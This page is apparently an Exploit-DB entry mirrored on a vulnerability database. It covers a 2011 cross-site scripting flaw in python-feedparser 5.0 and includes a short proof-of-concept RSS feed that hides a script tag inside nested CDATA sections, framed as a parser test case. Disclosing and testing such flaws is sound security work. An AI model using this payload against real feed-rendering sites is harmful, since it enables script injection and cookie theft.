Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbFazalmajidEDB-ID:35570
HistoryApr 05, 2011 - 12:00 a.m.

python-feedparser 5.0 - '/feedparser/feedparser.py' Cross-Site Scripting

2011-04-0500:00:00
fazalmajid
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/47177/info


python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

<!--
Description: ensure nested CDATA sections are sanitized properly
Expect: bozo and entries[0]['content'][0]['value'] == u'<![CDATA[]]>'
-->
<rss xmlns:content="http://www.example.com/rss/1.0/modules/content/" version="2.0">
<channel>
  <item>
    <content:encoded><![CDATA[<![CDATA[<script></script>]]>]]></content:encoded>
  </item>
</channel>
</rss

Related

prion 1
osv 2
github 1
ubuntucve 1
debiancve 1
nvd 1
cvelist 1
cve 1
fedora 5
nessus 9
openvas 10
securityvulns 2
prion
prion
Cross site scripting
2011-04-11 18:55:00
osv
osv
PYSEC-2011-18
2011-04-11 18:55:00
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in feedparser
2022-05-02 04:00:51
github
github
feedparser Cross-site Scripting vulnerability
2022-05-02 04:00:51
ubuntucve
ubuntucve
CVE-2009-5065
2011-04-11 00:00:00
debiancve
debiancve
CVE-2009-5065
2011-04-11 18:55:01
nvd
nvd
CVE-2009-5065
2011-04-11 18:55:01
cvelist
cvelist
CVE-2009-5065
2011-04-11 18:00:00
cve
cve
CVE-2009-5065
2011-04-11 18:55:01
fedora
fedora
[SECURITY] Fedora 13 Update: python-feedparser-5.0.1-1.fc13
2011-04-25 20:53:09
[SECURITY] Fedora 14 Update: python-feedparser-5.0.1-1.fc14
2011-04-25 20:56:40
[SECURITY] Fedora 15 Update: python-feedparser-5.0.1-1.fc15
2011-04-15 21:55:17
nessus
nessus
Mandriva Linux Security Advisory : python-feedparser (MDVSA-2011:082)
2011-05-03 00:00:00
openSUSE Security Update : python-feedparser (openSUSE-SU-2011:0314-1)
2014-06-13 00:00:00
Fedora 13 : python-feedparser-5.0.1-1.fc13 (2011-4911)
2011-04-26 00:00:00
openvas
openvas
Fedora Update for python-feedparser FEDORA-2011-4894
2011-05-05 00:00:00
Fedora Update for python-djblets FEDORA-2012-11668
2012-08-30 00:00:00
Fedora Update for python-djblets FEDORA-2012-11668
2012-08-30 00:00:00
securityvulns
securityvulns
[ MDVSA-2011:082 ] python-feedparser
2011-05-02 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2011-05-02 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:35570
prion1osv2github1ubuntucve1debiancve1nvd1cvelist1cve1fedora5nessus9openvas10securityvulns2